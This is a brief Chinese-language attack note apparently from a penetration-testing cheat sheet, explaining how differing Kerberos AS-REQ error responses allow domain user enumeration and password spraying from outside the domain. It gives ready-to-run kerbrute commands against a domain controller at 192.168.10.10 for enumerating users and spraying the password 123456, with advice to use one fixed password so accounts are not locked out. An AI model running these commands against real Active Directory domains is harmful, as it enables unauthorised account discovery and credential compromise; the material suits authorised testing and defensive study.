域用户枚举,密码喷洒
在kerberos的AS-REQ认证中当cname值中的用户不存在时返回包提示错误,当用户名存在时,密码正确或者错误返回包结果也不一样,所以可以尝试域用户枚举和密码喷洒攻击。
都可以在域外使用,但是能与域控ping通。
ps:user.txt用户名文件格式不需要加域名
域内用户枚举
当主机不在域内时,可以通过域内用户枚举来探测域内用户。
kerbrute_windows_amd64.exe userenum --dc 192.168.10.10 -d hiro.com user.txt
密码喷洒
密码错误次数过多可能导致用户的账户被锁定,所以用固定密码来跑用户名
kerbrute_windows_amd64.exe passwordspray --dc 192.168.10.10 -d hiro.com user.txt 123456